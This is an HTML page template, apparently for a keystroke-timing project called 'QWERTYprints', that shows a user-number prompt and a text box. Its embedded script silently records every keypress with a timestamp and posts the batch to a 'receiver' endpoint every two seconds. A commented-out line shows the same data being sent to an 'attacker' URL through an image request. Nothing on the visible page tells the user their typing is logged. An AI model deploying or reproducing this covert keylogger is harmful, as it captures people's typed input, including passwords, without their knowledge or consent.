<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script type="text/javascript">
var buffer = [];

document.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp
    };
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
        $.post("receiver", buffer, function(){
            
        });
        // var data = encodeURIComponent(JSON.stringify(buffer));
        // new Image().src = attacker + data;
        buffer = [];
        // event.preventDefault();
    }
}, 2000);

</script>
<html>
    <head>
        <title>QWERTYprints</title>
    </head>
    <a href="" id="I Do nothing">Click Me</a>
    <body>
        <h1>Hello, user No. {{ user}}!</h1>
        <h2>Please enter user number in url and hit ENTER</h2>
        <p>Please pick a user between 1 and 75</p>
        <textarea id="texas" rows="10" cols="60"></textarea>
    </body>
</html>